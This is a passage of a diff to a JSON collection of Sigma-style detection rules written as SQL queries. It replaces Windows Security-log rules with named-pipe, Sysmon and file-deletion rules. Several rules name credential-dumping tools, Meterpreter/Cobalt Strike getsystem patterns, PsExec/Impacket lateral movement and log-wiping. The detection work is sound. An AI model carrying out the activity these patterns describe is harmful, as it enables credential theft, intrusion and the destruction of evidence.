NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "falsepositives": [ - "User using a disabled account" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" - ], - "filename": "win_security_susp_failed_logon_reasons.yml" - }, - { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR 
PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - 
"author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program 
Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "status": "test", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", "attack.t1569.002" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1039" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" + "Legitimate Administrator using tool for password recovery" ], - "level": 
"medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Highly unlikely" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName 
LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - 
"attack.t1553.002", - "attack.s0195" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of SDelete" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", - "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "There are no known false positives at this time" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs 
WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Malicious Service Installations", - "id": 
"cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "status": "experimental", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + 
"attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "status": "experimental", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the IIS service", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": 
"file_delete_win_delete_iis_access_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - 
"attack.t1528" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "status": "experimental", + "description": "Detects deletion of files with extensions often used for backup files. 
